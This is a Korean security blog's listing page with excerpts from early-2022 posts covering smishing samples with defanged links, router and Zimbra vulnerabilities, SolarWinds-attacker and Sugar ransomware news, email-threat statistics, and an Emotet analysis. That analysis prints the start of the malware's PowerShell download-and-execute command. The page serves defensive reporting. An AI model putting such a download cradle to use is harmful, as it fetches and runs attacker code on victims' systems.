[2월 첫 번째 주] 알약 스미싱 알림 본 포스트는 알약M 사용자 분들이 '신고하기' 기능을 통해 알약으로 신고해 주신 스미싱 내역 중 '특이 문자'를 자체 수집, 집계하여 제공해 드리는 정보성 포스트입니다. 특이 문자 No. 문자내용 1 [Web발신] 차량 불법 벌점 처벌 통지서 발송 완료 dokdo[.]in/xxx 2 [Web발신] 차량 도로 위반은 빠른 시일 내에 처리해 주시기 바랍니다. hxxps://bit[.]ly/xxxxxxx 3 [Web발신][교통민원24(이파인)]2022 교통범칙금고지서 발송 완료 hxxps://dokdo[.]in/xxx 4 [Web발신] 건강보험공단 건강검진 결과발송.결과확인:xx.xxxx[.]host 5 [CJ대한통운] 통관번호오류로 주문하신 상품이 통관대기중입니다. h..

안전한 PC&모바일 세상/스미싱 알림 2022. 2. 4. 17:37

Critical Flaws Discovered in Cisco Small Business RV Series Routers Cisco가 RV 시리즈 라우터에 영향을 미치는 치명적인 보안 취약점 다수를 패치했습니다. 해당 취약점은 공격자의 권한을 상승시키고 영향을 받는 시스템에서 임의의 코드를 실행하도록 무기화될 수 있으며, 버그 중 일부는 이미 PoC 익스플로잇 코드가 존재하는 것으로 나타났습니다. 취약점 15개 중 CVE-2022-20699, CVE-2022-20700, CVE-2022-20707로 등록된 3개는 가장 높은 CVSS 등급인 10을 받았으며 Small Business RV160, RV260, RV340 및 RV345 라우터에 존재합니다. 또한 이 취약점을 악용하여 인증 및 권한 부여 보호장..

국내외 보안동향 2022. 2. 4. 14:00

Zimbra zero-day vulnerability actively exploited to steal emails Zimbra 이메일 플랫폼의 XSS 취약점이 현재 유럽 언론 및 정부 기관을 노린 공격에 적극적으로 악용되고 있습니다. Zimbra는 인스턴트 메시징, 연락처, 화상 회의, 파일 공유, 클라우드 스토리지 기능을 포함하는 이메일 및 협업 플랫폼입니다. Zimbra에 따르면 140개국 이상의 기업 20만곳 이상에서 이 소프트웨어를 사용하고 있으며, 이 중 1천곳 이상은 정부 및 금융기관인 것으로 나타났습니다. 중국 공격자와 연결돼 연구원들은 아래와 같이 밝혔습니다. "이 글을 작성하는 시점에서 이 익스플로잇은 패치되지 않은 상태이며 CVE 번호가 할당되지 않았습니다.(제로데이 취약점)” "Vo..

국내외 보안동향 2022. 2. 4. 09:00

안녕하세요? 이스트시큐리티 ESRC(시큐리티대응센터)입니다. ESRC에서는 자체 운영 중인 이메일 모니터링 시스템의 데이터를 통해 이메일 중심의 공격이 어떻게 이루어지고 있는지 공유하고 있습니다. 다음은 01월 23일~01월 29일까지의 주간 통계 정보입니다. 1. 이메일 유입량 지난주 이메일 유입량은 총 211건이고 그중 악성은 87건으로 41.23%의 비율을 보였습니다. 악성 이메일의 경우 그 전주 45건 대비 87건으로 42건이 증가했습니다. 일일 유입량은 하루 최저 12건(악성 1건)에서 최대 50건(악성 24건)으로 일별 편차를 확인할 수 있습니다. 2. 이메일 유형 악성 이메일을 유형별로 살펴보면 87건 중 Attach-Malware형이 62.1%로 가장 많았고 뒤이어 Link-Malware형..

악성코드 분석 리포트 2022. 2. 3. 19:00

New Malware Used by SolarWinds Attackers Went Undetected for Years SolarWinds의 공급망 해킹을 실행한 공격자가 최소 2019년 초부터 공격에 배포된 새로운 툴과 기술을 통해 악성코드 무기고를 계속 확장해온 것으로 나타났습니다. 이는 파악이 어려운 캠페인의 특성과 수 년간 지속적인 접근을 유지할 수 있었기 때문이었습니다. 지난 주, 사이버 보안 회사인 CrowdStrike는 노벨리움 해킹 그룹이 채택한 새로운 전술을 자세히 설명했습니다. 회사에 따르면 공격의 규모가 밝혀지기 훨씬 전부터 피해자의 시스템에 GoldMax의 Linux 변종과 새로운 임플란트인 TrailBlazer 를 포함한 두 가지 정교한 악성코드 패밀리가 설치되었습니다. 마이크로소..

국내외 보안동향 2022. 2. 3. 14:00

안녕하세요? 이스트시큐리티 시큐리티대응센터(이하 ESRC)입니다. 이스트시큐리티 시큐리티대응센터(ESRC)를 위장한 피싱 메일이 유포되고 있어 사용자들의 주의가 필요합니다. 해당 메일은 '[알림]스팸메일 대량 발송'의 제목으로 유포되고 있으며, ESRC가 운영중인 이메일 모니터링 시스템의 데이터를 통하여 수신자의 이메일 주소를 사칭한 스팸메일 발송 내역이 확인되었다는 내용을 포함하고 있습니다. 해당 이메일은 특정 분야의 전문가들을 대상으로 유포되고 있는것으로 확인되었으며, 대량으로 유포중에 있는 것으로 추정되고 있어 사용자들의 각별한 주의가 필요합니다. 사용자 여러분들께서는 이러한 이메일을 수신하시면 바로 삭제를 해주시기를 바라며, 기업 보안담당자 여러분들은 저희가 공개한 이메일 주소 및 발신지 ip를 ..

악성코드 분석 리포트 2022. 2. 3. 11:59

Sugar Ransomware, a new RaaS in the threat landscape 거대 소매업체인 Walmart의 사이버 위협 팀이 새로운 서비스형 랜섬웨어 패밀리인 Sugar를 분석했습니다. 다른 랜섬웨어와는 달리 Sugar는 기업 전체 보다는 주로 개별 컴퓨터에 집중하는 것으로 보입니다. Sugar 악성코드는 2021년 11월 실제 공격에서 처음 발견되었으며, 다른 랜섬웨어 패밀리의 코드를 차용한 Delphi 악성코드입니다. 이 새로운 악성코드 패밀리의 가장 흥미로운 컴포넌트 중 하나는 크립터로 수정된 버전의 RC4 알고리즘을 사용하고 악성코드에서 문자열 디코딩의 일부로 크립터의 동일한 루틴을 재사용합니다. 이는 Sugar 랜섬웨어와 해당 크립터가 동일한 팀에서 개발되었음을 의미합니다. ..

국내외 보안동향 2022. 2. 3. 09:00

안녕하세요? 이스트시큐리티 시큐리티대응센터(이하 ESRC)입니다. 어제부터 이모텟(emotet) 악성코드가 대량으로 유포중에 있어 사용자들의 주의가 필요합니다. 이메일에는 별다른 내용 없이 첨부되어 있는 압축파일의 패스워드만 적혀있습니다. 압축파일 내에는 매크로가 포함된 엑셀 파일이 포함되어 있으며, 문서가 보호되어있다며 사용자로 하여금 '콘텐츠 사용' 버튼의 클릭을 유도합니다. 해당 엑셀파일에는 매크로 악성파일이 포함되어 있으며, 매크로는 특정 사이트에서 html을 hta 형식으로 실행합니다. html은 난독화 되어 있으며, 최종적으로 내부에 포함된 파워쉘 스크립트를 실행합니다 powershell.exe -noexit $c1='(New-Object Net.WebClient).DownloadString(..

악성코드 분석 리포트 2022. 1. 28. 15:26